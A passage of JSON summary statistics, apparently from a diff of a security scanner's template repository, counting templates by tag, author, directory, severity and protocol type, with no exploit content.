me":"cve2008","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"confluence","count":5},{"name":"fileupload","count":5},{"name":"microsoft","count":5},{"name":"circarlife","count":5},{"name":"wp-theme","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"dedecms","count":5},{"name":"drupal","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"docker","count":5},{"name":"printer","count":5},{"name":"ibm","count":5},{"name":"phpmyadmin","count":5},{"name":"nodejs","count":4},{"name":"elastic","count":4},{"name":"jolokia","count":4},{"name":"exchange","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"webserver","count":4},{"name":"thinkcmf","count":4},{"name":"tomcat","count":4},{"name":"deserialization","count":4},{"name":"firmware","count":4},{"name":"hp","count":4},{"name":"asp","count":4},{"name":"grafana","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"crlf","count":4},{"name":"vpn","count":4},{"name":"moodle","count":4},{"name":"buffalo","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"magmi","count":4},{"name":"zimbra","count":4},{"name":"r-seenet","count":3},{"name":"itop","count":3},{"name":"caucho","count":3},{"name":"kevinlab","count":3},{"name":"log","count":3},{"name":"mongodb","count":3},{"name":"zabbix","count":3},{"name":"httpd","count":3},{"name":"nexus","count":3},{"name":"oa","count":3},{"name":"zhiyuan","count":3},{"name":"symfony","count":3},{"name":"terramaster","count":3},{"name":"microstrategy","count":3},{"name":"amazon","count":3},{"name":"slack","count":3},{"name":"springcloud","count":3},{"name":"ebs","count":3},{"name":"fanruan","count":3},{"name":"nosqli","count":3},{"name":"git","count":3},{"name":"tikiwiki","count":3},{"name":"opensis","count":3},{"name":"kubernetes","count":3},{"name":"openssh","count":3},{"name":"bypass","count":3},{"name":"backups","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"targa","count":3},{"name":"lfr","count":3},{"name":"ofbiz","count":3},{"name":"fpd","count":3},{"name":"bitrix","count":3},{"name":"intrusive","count":3},{"name":"wso2","count":3},{"name":"resin","count":3},{"name":"ssh","count":3},{"name":"vbulletin","count":3},{"name":"dos","count":2},{"name":"jboss","count":2},{"name":"shellshock","count":2},{"name":"cache","count":2},{"name":"nagios","count":2},{"name":"akkadian","count":2},{"name":"keycloak","count":2},{"name":"proxy","count":2},{"name":"splunk","count":2},{"name":"horde","count":2},{"name":"natshell","count":2},{"name":"dolibarr","count":2},{"name":"saltstack","count":2},{"name":"status","count":2},{"name":"hasura","count":2},{"name":"service","count":2},{"name":"sonicwall","count":2},{"name":"vrealize","count":2},{"name":"chamilo","count":2},{"name":"leak","count":2},{"name":"akamai","count":2},{"name":"frp","count":2},{"name":"openam","count":2},{"name":"azure","count":2},{"name":"rstudio","count":2},{"name":"phpcollab","count":2},{"name":"jsf","count":2},{"name":"maian","count":2},{"name":"chiyu","count":2},{"name":"ecology","count":2},{"name":"rockethchat","count":2},{"name":"hpe","count":2},{"name":"ucmdb","count":2},{"name":"openfire","count":2},{"name":"paloalto","count":2},{"name":"couchdb","count":2},{"name":"igs","count":2},{"name":"trixbox","count":2},{"name":"bigip","count":2},{"name":"emerge","count":2},{"name":"smtp","count":2},{"name":"glassfish","count":2},{"name":"prometheus","count":2},{"name":"yapi","count":2},{"name":"icewarp","count":2},{"name":"backdoor","count":2},{"name":"hjtcloud","count":2},{"name":"grav","count":2},{"name":"kentico","count":2},{"name":"voipmonitor","count":2},{"name":"prestashop","count":2},{"name":"idrac","count":2},{"name":"cve2005","count":2},{"name":"sharepoint","count":2},{"name":"xxljob","count":2},{"name":"spark","count":2},{"name":"webcam","count":2},{"name":"activemq","count":2},{"name":"fortios","count":2},{"name":"firebase","count":2},{"name":"huawei","count":2},{"name":"jeedom","count":2},{"name":"globalprotect","count":2},{"name":"injection","count":2},{"name":"rockmongo","count":2},{"name":"netis","count":2},{"name":"waf","count":2},{"name":"oauth","count":2},{"name":"flir","count":2},{"name":"telerik","count":2},{"name":"guacamole","count":2},{"name":"avantfax","count":2},{"name":"wordfence","count":2},{"name":"seeyon","count":2},{"name":"strapi","count":2},{"name":"plesk","count":2},{"name":"pega","count":2},{"name":"sonarqube","count":2},{"name":"odoo","count":2},{"name":"showdoc","count":2},{"name":"github","count":2},{"name":"hoteldruid","count":2},{"name":"smb","count":2},{"name":"cve2007","count":2},{"name":"hashicorp","count":2},{"name":"linkerd","count":2},{"name":"mcafee","count":2},{"name":"mida","count":2},{"name":"jellyfin","count":2},{"name":"mail","count":2},{"name":"kibana","count":2},{"name":"geowebserver","count":2},{"name":"nextjs","count":2},{"name":"discourse","count":1},{"name":"pippoint","count":1},{"name":"cloudflare","count":1},{"name":"bash","count":1},{"name":"zenario","count":1},{"name":"blind","count":1},{"name":"pyramid","count":1},{"name":"webui","count":1},{"name":"tenda","count":1},{"name":"xmlchart","count":1},{"name":"memcached","count":1},{"name":"shopxo","count":1},{"name":"panos","count":1},{"name":"codeigniter","count":1},{"name":"rabbitmq","count":1},{"name":"nweb2fax","count":1},{"name":"aruba","count":1},{"name":"openstack","count":1},{"name":"sgp","count":1},{"name":"empirecms","count":1},{"name":"ns","count":1},{"name":"netsweeper","count":1},{"name":"ems","count":1},{"name":"plc","count":1},{"name":"dotnet","count":1},{"name":"expressjs","count":1},{"name":"cacti","count":1},{"name":"centreon","count":1},{"name":"pacsone","count":1},{"name":"mobileiron","count":1},{"name":"pagespeed","count":1},{"name":"landrayoa","count":1},{"name":"eyelock","count":1},{"name":"concrete","count":1},{"name":"proftpd","count":1},{"name":"visualtools","count":1},{"name":"api-manager","count":1},{"name":"clockwatch","count":1},{"name":"websvn","count":1},{"name":"jenzabar","count":1},{"name":"addpac","count":1},{"name":"mysql","count":1},{"name":"gloo","count":1},{"name":"default","count":1},{"name":"stem","count":1},{"name":"wiki","count":1},{"name":"doh","count":1},{"name":"avalanche","count":1},{"name":"asus","count":1},{"name":"skywalking","count":1},{"name":"alertmanager","count":1},{"name":"tika","count":1},{"name":"bolt","count":1},{"name":"cerebro","count":1},{"name":"shopware","count":1},{"name":"opencast","count":1},{"name":"accela","count":1},{"name":"lanproxy","count":1},{"name":"vscode","count":1},{"name":"rmi","count":1},{"name":"acontent","count":1},{"name":"ilo","count":1},{"name":"tpshop","count":1},{"name":"erp-nc","count":1},{"name":"solarlog","count":1},{"name":"discord","count":1},{"name":"vsftpd","count":1},{"name":"sourcebans","count":1},{"name":"floc","count":1},{"name":"74cms","count":1},{"name":"darkstat","count":1},{"name":"geutebruck","count":1},{"name":"livezilla","count":1},{"name":"phpinfo","count":1},{"name":"geddy","count":1},{"name":"cse","count":1},{"name":"mara","count":1},{"name":"influxdb","count":1},{"name":"bedita","count":1},{"name":"fastapi","count":1},{"name":"azkaban","count":1},{"name":"redis","count":1},{"name":"salesforce","count":1},{"name":"smartblog","count":1},{"name":"yachtcontrol","count":1},{"name":"csod","count":1},{"name":"druid","count":1},{"name":"javamelody","count":1},{"name":"krweb","count":1},{"name":"totaljs","count":1},{"name":"hortonworks","count":1},{"name":"scimono","count":1},{"name":"cocoon","count":1},{"name":"bitly","count":1},{"name":"fortiweb","count":1},{"name":"expn","count":1},{"name":"javascript","count":1},{"name":"tectuus","count":1},{"name":"selea","count":1},{"name":"fortinet","count":1},{"name":"rujjie","count":1},{"name":"commax","count":1},{"name":"spf","count":1},{"name":"yealink","count":1},{"name":"lotuscms","count":1},{"name":"owasp","count":1},{"name":"node-red-dashboard","count":1},{"name":"primetek","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"phpunit","count":1},{"name":"bazarr","count":1},{"name":"mpsec","count":1},{"name":"miscrsoft","count":1},{"name":"zarafa","count":1},{"name":"adminer","count":1},{"name":"openerp","count":1},{"name":"linux","count":1},{"name":"biometrics","count":1},{"name":"emby","count":1},{"name":"xiuno","count":1},{"name":"lg-nas","count":1},{"name":"xunchi","count":1},{"name":"mongoshake","count":1},{"name":"couchbase","count":1},{"name":"ec2","count":1},{"name":"iceflow","count":1},{"name":"froxlor","count":1},{"name":"cherokee","count":1},{"name":"ulterius","count":1},{"name":"realteo","count":1},{"name":"wazuh","count":1},{"name":"redhat","count":1},{"name":"npm","count":1},{"name":"tracer","count":1},{"name":"setup","count":1},{"name":"webadmin","count":1},{"name":"keenetic","count":1},{"name":"adb","count":1},{"name":"manageengine","count":1},{"name":"embedthis","count":1},{"name":"cgi","count":1},{"name":"tjws","count":1},{"name":"postgres","count":1},{"name":"labtech","count":1},{"name":"majordomo2","count":1},{"name":"spectracom","count":1},{"name":"clave","count":1},{"name":"xff","count":1},{"name":"sophos","count":1},{"name":"st","count":1},{"name":"smartsense","count":1},{"name":"monitorix","count":1},{"name":"interlib","count":1},{"name":"springframework","count":1},{"name":"faraday","count":1},{"name":"grails","count":1},{"name":"dvr","count":1},{"name":"fortilogger","count":1},{"name":"sidekiq","count":1},{"name":"cors","count":1},{"name":"finereport","count":1},{"name":"jsp","count":1},{"name":"aspnuke","count":1},{"name":"ioncube","count":1},{"name":"tongda","count":1},{"name":"iptime","count":1},{"name":"vnc","count":1},{"name":"circontrol","count":1},{"name":"flash","count":1},{"name":"xvr","count":1},{"name":"openemr","count":1},{"name":"owa","count":1},{"name":"zcms","count":1},{"name":"turbocrm","count":1},{"name":"jitsi","count":1},{"name":"jquery","count":1},{"name":"axis","count":1},{"name":"wing-ftp","count":1},{"name":"argussurveillance","count":1},{"name":"bullwark","count":1},{"name":"maccmsv10","count":1},{"name":"tensorflow","count":1},{"name":"perl","count":1},{"name":"ruckus","count":1},{"name":"ganglia","count":1},{"name":"bruteforce","count":1},{"name":"subrion","count":1},{"name":"svn","count":1},{"name":"rfi","count":1},{"name":"upnp","count":1},{"name":"sentry","count":1},{"name":"magicflow","count":1},{"name":"szhe","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"rubedo","count":1},{"name":"sarg","count":1},{"name":"appweb","count":1},{"name":"gateone","count":1},{"name":"thinkadmin","count":1},{"name":"wmt","count":1},{"name":"plastic","count":1},{"name":"fortigate","count":1},{"name":"chinaunicom","count":1},{"name":"nette","count":1},{"name":"rsyncd","count":1},{"name":"socomec","count":1},{"name":"gridx","count":1},{"name":"saltapi","count":1},{"name":"db","count":1},{"name":"zend","count":1},{"name":"nsasg","count":1},{"name":"wuzhicms","count":1},{"name":"spip","count":1},{"name":"jfrog","count":1},{"name":"goahead","count":1},{"name":"netdata","count":1},{"name":"eprints","count":1},{"name":"calendarix","count":1},{"name":"tamronos","count":1},{"name":"sprintful","count":1},{"name":"tieline","count":1},{"name":"k8s","count":1},{"name":"sage","count":1},{"name":"lancom","count":1},{"name":"monitorr","count":1},{"name":"kerbynet","count":1},{"name":"octobercms","count":1},{"name":"netrc","count":1},{"name":"sitecore","count":1},{"name":"qcubed","count":1},{"name":"cloudinary","count":1},{"name":"trane","count":1},{"name":"kafdrop","count":1},{"name":"yii","count":1},{"name":"traefik","count":1},{"name":"exponentcms","count":1},{"name":"jeewms","count":1},{"name":"blue-ocean","count":1},{"name":"wondercms","count":1},{"name":"emc","count":1},{"name":"kong","count":1},{"name":"spidercontrol","count":1},{"name":"seacms","count":1},{"name":"apos","count":1},{"name":"acexy","count":1},{"name":"cofax","count":1},{"name":"klog","count":1},{"name":"dotnetnuke","count":1},{"name":"wamp","count":1},{"name":"varnish","count":1},{"name":"timesheet","count":1},{"name":"kyan","count":1},{"name":"gotmls","count":1},{"name":"wavlink","count":1},{"name":"clusterengine","count":1},{"name":"synnefo","count":1},{"name":"oscommerce","count":1},{"name":"woocomernce","count":1},{"name":"servicedesk","count":1},{"name":"jnoj","count":1},{"name":"visionhub","count":1},{"name":"anchorcms","count":1},{"name":"zyxel","count":1},{"name":" default-login","count":1},{"name":"powercreator","count":1},{"name":"pcoip","count":1},{"name":"cve2006","count":1},{"name":"resourcespace","count":1},{"name":"solman","count":1},{"name":"ntopng","count":1},{"name":"spring","count":1},{"name":"timeclock","count":1},{"name":"dbeaver","count":1},{"name":"favicon","count":1},{"name":"portainer","count":1},{"name":"sceditor","count":1},{"name":"ewebs","count":1},{"name":"ricoh","count":1},{"name":"panabit","count":1},{"name":"exposures","count":1},{"name":"octoprint","count":1},{"name":"hiboss","count":1},{"name":"swagger","count":1},{"name":"sco","count":1},{"name":"fiori","count":1},{"name":"plugin","count":1},{"name":"tapestry","count":1},{"name":"ssltls","count":1},{"name":"k8","count":1},{"name":"ecom","count":1},{"name":"viewpoint","count":1},{"name":"htmli","count":1},{"name":"office365","count":1},{"name":"phalcon","count":1},{"name":"zeroshell","count":1},{"name":"svnserve","count":1},{"name":"crm","count":1},{"name":"camera","count":1},{"name":"redwood","count":1},{"name":"rdp","count":1},{"name":"getsimple","count":1},{"name":"alibaba","count":1},{"name":"sureline","count":1},{"name":"vsphere","count":1},{"name":"acme","count":1},{"name":"twitter-server","count":1},{"name":"uwsgi","count":1},{"name":"parentlink","count":1},{"name":"simplecrm","count":1},{"name":"expose","count":1},{"name":"mailchimp","count":1},{"name":"xml","count":1},{"name":"netgenie","count":1},{"name":"extractor","count":1},{"name":"mediumish","count":1},{"name":"landray","count":1},{"name":"viewlinc","count":1},{"name":"bookstack","count":1},{"name":"checkpoint","count":1},{"name":"servicenow","count":1},{"name":"enum","count":1},{"name":"weiphp","count":1},{"name":"rmc","count":1},{"name":"wifisky","count":1},{"name":"ruby","count":1},{"name":"kubeflow","count":1},{"name":"enumeration","count":1},{"name":"avtech","count":1},{"name":"zookeeper","count":1},{"name":"opm","count":1},{"name":"nomad","count":1},{"name":"fastcgi","count":1},{"name":"dvwa","count":1},{"name":"nedi","count":1},{"name":"tileserver","count":1},{"name":"nc2","count":1},{"name":"lansweeper","count":1},{"name":"razor","count":1},{"name":"nordex","count":1},{"name":"nuuo","count":1},{"name":"mongo","count":1},{"name":"mdb","count":1},{"name":"2014","count":1},{"name":"lutron","count":1},{"name":"harbor","count":1},{"name":"etouch","count":1},{"name":"zm","count":1},{"name":"diris","count":1},{"name":"zmanda","count":1},{"name":"announcekit","count":1},{"name":"mirai","count":1},{"name":"mautic","count":1},{"name":"aura","count":1},{"name":"rhymix","count":1},{"name":"logontracer","count":1},{"name":"pgadmin","count":1},{"name":"glances","count":1},{"name":"sar2html","count":1},{"name":"commscope","count":1},{"name":"linksys","count":1},{"name":"zte","count":1},{"name":"email","count":1},{"name":"opensmtpd","count":1},{"name":"jenkin","count":1},{"name":"mantisbt","count":1},{"name":"fortigates","count":1},{"name":"ueditor","count":1},{"name":"blackboard","count":1},{"name":"dotclear","count":1},{"name":"codemeter","count":1},{"name":"javafaces","count":1},{"name":"mantis","count":1},{"name":"heroku","count":1},{"name":"nps","count":1},{"name":"sqlite","count":1},{"name":"webmin","count":1},{"name":"apiman","count":1},{"name":"scs","count":1},{"name":"trilithic","count":1},{"name":"wildfly","count":1},{"name":"plone","count":1},{"name":"ssl","count":1},{"name":"qvisdvr","count":1},{"name":"phpfusion","count":1},{"name":"fuelcms","count":1},{"name":"hadoop","count":1},{"name":"smi","count":1},{"name":"circontrorl","count":1},{"name":"myucms","count":1},{"name":"metinfo","count":1},{"name":"drone","count":1},{"name":"zzzcms","count":1},{"name":"dom","count":1},{"name":"webmodule-ee","count":1},{"name":"soar","count":1},{"name":"esmtp","count":1},{"name":"arl","count":1},{"name":"jmx","count":1},{"name":"nuxeo","count":1},{"name":"dnssec","count":1},{"name":"ghost","count":1},{"name":"payara","count":1},{"name":"episerver","count":1},{"name":"b2evolution","count":1},{"name":"linkedin","count":1},{"name":"idemia","count":1},{"name":"mariadb","count":1},{"name":"node","count":1},{"name":"haproxy","count":1},{"name":"qsan","count":1},{"name":"dompdf","count":1},{"name":"centos","count":1},{"name":"flink","count":1},{"name":"feifeicms","count":1},{"name":"postmessage","count":1},{"name":"upload","count":1},{"name":"gitlist","count":1},{"name":"opensns","count":1},{"name":"liferay","count":1},{"name":"nexusdb","count":1},{"name":"opentsdb","count":1},{"name":"triconsole","count":1},{"name":"ilo4","count":1},{"name":"huijietong","count":1},{"name":"wooyun","count":1},{"name":"gogs","count":1},{"name":"beanshell","count":1},{"name":"auth","count":1},{"name":"openrestry","count":1},{"name":"duomicms","count":1},{"name":"gespage","count":1},{"name":"chevereto","count":1},{"name":"comodo","count":1},{"name":"optiLink","count":1},{"name":"redcap","count":1},{"name":"exacqvision","count":1},{"name":"oneblog","count":1},{"name":"openx","count":1},{"name":"webftp","count":1},{"name":"qdpm","count":1},{"name":"bigbluebutton","count":1},{"name":"tensorboard","count":1},{"name":"alerta","count":1},{"name":"clink-office","count":1},{"name":"xdcms","count":1},{"name":"ambari","count":1},{"name":"moinmoin","count":1},{"name":"phpfastcache","count":1},{"name":"eyou","count":1},{"name":"csrf","count":1},{"name":"pulsesecure","count":1},{"name":"camunda","count":1},{"name":"achecker","count":1},{"name":"starttls","count":1},{"name":"cobub","count":1},{"name":"domxss","count":1},{"name":"lighttpd","count":1},{"name":"sangfor","count":1},{"name":"robomongo","count":1},{"name":"moin","count":1}],"authors":[{"name":"dhiyaneshdk","count":245},{"name":"pikpikcu","count":244},{"name":"pdteam","count":198},{"name":"daffainfo","count":164},{"name":"geeknik","count":149},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":54},{"name":"pussycat0x","count":44},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"wdahlenb","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"iamnoooob","count":5},{"name":"pentest_swissky","count":5},{"name":"meme-lord","count":5},{"name":"ganofins","count":5},{"name":"e_schultze_","count":4},{"name":"dogasantos","count":4},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"z3bd","count":3},{"name":"vsh00t","count":3},{"name":"fyoorer","count":3},{"name":"logicalhunter","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"incogbyte","count":3},{"name":"mavericknerd","count":3},{"name":"tess","count":3},{"name":"_generic_human_","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"impramodsargar","count":3},{"name":"jarijaas","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"gevakun","count":2},{"name":"afaq","count":2},{"name":"0xcrypto","count":2},{"name":"0xsapra","count":2},{"name":"moritz nentwig","count":2},{"name":"0xelkomy","count":2},{"name":"mohammedsaneem","count":2},{"name":"unstabl3","count":2},{"name":"alifathi-h1","count":2},{"name":"dheerajmadhukar","count":2},{"name":"w4cky_","count":2},{"name":"udit_thakkur","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"koti2","count":2},{"name":"sushantkamble","count":2},{"name":"ehsahil","count":2},{"name":"randomrobbie","count":2},{"name":"x1m_martijn","count":2},{"name":"ree4pwn","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"whoever","count":2},{"name":"gal nagli","count":2},{"name":"0xprial","count":2},{"name":"bing0o","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"fabaff","count":2},{"name":"parth","count":2},{"name":"random-robbie","count":2},{"name":"arcc","count":2},{"name":"amsda","count":2},{"name":"bsysop","count":2},{"name":"foulenzer","count":2},{"name":"vavkamil","count":2},{"name":"joeldeleep","count":2},{"name":"kiblyn11","count":2},{"name":"hahwul","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"lotusdll","count":2},{"name":"nkxxkn","count":2},{"name":"furkansenan","count":1},{"name":"omarkurt","count":1},{"name":"pudsec","count":1},{"name":"petruknisme","count":1},{"name":"pratik khalane","count":1},{"name":"regala_","count":1},{"name":"alex","count":1},{"name":"sicksec","count":1},{"name":"knassar702","count":1},{"name":"naglinagli","count":1},{"name":"aresx","count":1},{"name":"0xteles","count":1},{"name":"blckraven","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ringo","count":1},{"name":"mubassirpatel","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"hanlaomo","count":1},{"name":"abison_binoy","count":1},{"name":"r3naissance","count":1},{"name":"becivells","count":1},{"name":"makyotox","count":1},{"name":"kurohost","count":1},{"name":"th3.d1p4k","count":1},{"name":"sec_hawk","count":1},{"name":"whynotke","count":1},{"name":"jeya seelan","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"nytr0gen","count":1},{"name":"undefl0w","count":1},{"name":"intx0x80","count":1},{"name":"rodnt","count":1},{"name":"noamrathaus","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"kareemse1im","count":1},{"name":"affix","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"daviey","count":1},{"name":"berkdusunur","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"jteles","count":1},{"name":"b0yd","count":1},{"name":"gboddin","count":1},{"name":"mah3sec_","count":1},{"name":"rojanrijal","count":1},{"name":"luskabol","count":1},{"name":"mhdsamx","count":1},{"name":"fmunozs","count":1},{"name":"elder tao","count":1},{"name":"flag007","count":1},{"name":"bad5ect0r","count":1},{"name":"mass0ma","count":1},{"name":"alph4byt3","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"dawid czarnecki","count":1},{"name":"bjhulst","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ahmed sherif","count":1},{"name":"cookiehanhoan","count":1},{"name":"infosecsanyam","count":1},{"name":"kabirsuda","count":1},{"name":"streetofhackerr007","count":1},{"name":"soyelmago","count":1},{"name":"luci","count":1},{"name":"akshansh","count":1},{"name":"_harleo","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ooooooo_q","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"rtcms","count":1},{"name":"taielab","count":1},{"name":"udyz","count":1},{"name":"shreyapohekar","count":1},{"name":"fopina","count":1},{"name":"b4uh0lz","count":1},{"name":"iampritam","count":1},{"name":"sshell","count":1},{"name":"0xtavian","count":1},{"name":"@dwisiswant0","count":1},{"name":"elmahdi","count":1},{"name":"patralos","count":1},{"name":"huowuzhao","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thevillagehacker","count":1},{"name":"sickwell","count":1},{"name":"adrianmf","count":1},{"name":"un-fmunozs","count":1},{"name":"philippdelteil","count":1},{"name":"wabafet","count":1},{"name":"yashgoti","count":1},{"name":"borna nematzadeh","count":1},{"name":"sullo","count":1},{"name":"pdp","count":1},{"name":"shelld3v","count":1},{"name":"divya_mudgal","count":1},{"name":"_c0wb0y_","count":1},{"name":"52971","count":1},{"name":"_darrenmartyn","count":1},{"name":"andirrahmani1","count":1},{"name":"smaranchand","count":1},{"name":"ilovebinbash","count":1},{"name":"johnjhacking","count":1},{"name":"manuelbua","count":1},{"name":"g4l1t0","count":1},{"name":"alperenkesk","count":1},{"name":"zhenwarx","count":1},{"name":"c3l3si4n","count":1},{"name":"co0nan","count":1},{"name":"revblock","count":1},{"name":"andysvints","count":1},{"name":"idealphase","count":1},{"name":"deena","count":1},{"name":"me9187","count":1},{"name":"0xrod","count":1},{"name":"mesaglio","count":1},{"name":"remonsec","count":1},{"name":"vzamanillo","count":1},{"name":"raesene","count":1},{"name":"j33n1k4","count":1},{"name":"0ut0fb4nd","count":1},{"name":"tirtha_mandal","count":1},{"name":"toufik airane","count":1},{"name":"qlkwej","count":1},{"name":"juicypotato1","count":1},{"name":"exploitation","count":1},{"name":"chron0x","count":1},{"name":"zandros0","count":1},{"name":"its0x08","count":1},{"name":"convisoappsec","count":1},{"name":"johnk3r","count":1},{"name":"schniggie","count":1},{"name":"evolutionsec","count":1},{"name":"0h1in9e","count":1},{"name":"s1r1u5_","count":1},{"name":"d0rkerdevil","count":1},{"name":"bolli95","count":1},{"name":"bernardofsr","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ipanda","count":1},{"name":"yashanand155","count":1},{"name":"tim_koopmans","count":1},{"name":"sy3omda","count":1},{"name":"akash.c","count":1},{"name":"notsoevilweasel","count":1},{"name":"thezakman","count":1},{"name":"retr0","count":1},{"name":"willd96","count":1},{"name":"ldionmarcil","count":1},{"name":"micha3lb3n","count":1},{"name":"defr0ggy","count":1},{"name":"ohlinge","count":1},{"name":"apt-mirror","count":1},{"name":"shifacyclewla","count":1},{"name":"ajaysenr","count":1},{"name":"hakluke","count":1},{"name":"yavolo","count":1}],"directory":[{"name":"cves","count":640},{"name":"vulnerabilities","count":283},{"name":"exposed-panels","count":231},{"name":"exposures","count":184},{"name":"technologies","count":163},{"name":"misconfiguration","count":125},{"name":"takeovers","count":71},{"name":"default-logins","count":51},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":29},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":603},{"name":"high","count":510},{"name":"medium","count":402},{"name":"critical","count":232},{"name":"low","count":160}],"types":[{"name":"http","count":1807},{"name":"file","count":46},{"name":"network","count":38},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":649},{"name":"panel","count":236},{"name":"xss","count":224},{"name":"lfi","count":221},{"name":"exposure","count":217},{"name":"wordpress","count":205},{"name":"rce","count":190},{"name":"cve2020","count":157},{"name":"wp-plugin","count":138},{"name":"tech","count":106},{"name":"cve2021","count":106},{"name":"config","count":93},{"name":"cve2019","count":91},{"name":"cve2018","count":80},{"name":"takeover","count":74},{"name":"apache","count":66},{"name":"","count":66},{"name":"token","count":64},{"name":"default-login","count":58},{"name":"iot","count":56},{"name":"joomla","count":52},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"oob","count":45},{"name":"cve2010","count":44},{"name":"network","count":39},{"name":"sqli","count":37},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"oracle","count":30},{"name":"logs","count":30},{"name":"workflow","count":30},{"name":"jira","count":28},{"name":"misc","count":27},{"name":"atlassian","count":27},{"name":"redirect","count":26},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"router","count":19},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"cve2015","count":19},{"name":"sap","count":18},{"name":"disclosure","count":18},{"name":"auth-bypass","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":14},{"name":"cve2012","count":14},{"name":"cve2011","count":13},{"name":"misconfig","count":13},{"name":"fuzz","count":13},{"name":"struts","count":13},{"name":"android","count":13},{"name":"jenkins","count":12},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"php","count":12},{"name":"adobe","count":12},{"name":"dlink","count":12},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"devops","count":11},{"name":"ftp","count":9},{"name":"aws","count":9},{"name":"magento","count":9},{"name":"xxe","count":9},{"name":"cnvd","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"ruijie","count":8},{"name":"login","count":8},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"cve2009","count":7},{"name":"nginx","count":7},{"name":"cms","count":7},{"name":"backup","count":7},{"name":"vmware","count":7},{"name":"jetty","count":6},{"name":"files","count":6},{"name":"google","count":6},{"name":"dell","count":6},{"name":"netgear","count":6},{"name":"solr","count":6},{"name":"django","count":6},{"name":"laravel","count":6},{"name":"cve2008","count":6},{"name":"coldfusion","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"confluence","count":5},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":5},{"name":"drupal","count":5},{"name":"microsoft","count":5},{"name":"printer","count":5},{"name":"headless","count":5},{"name":"wp-theme","count":5},{"name":"java","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"phpmyadmin","count":5},{"name":"wso2","count":4},{"name":"nodejs","count":4},{"name":"tomcat","count":4},{"name":"crlf","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"asp","count":4},{"name":"jolokia","count":4},{"name":"hp","count":4},{"name":"traversal","count":4},{"name":"zimbra","count":4},{"name":"vpn","count":4},{"name":"thinkcmf","c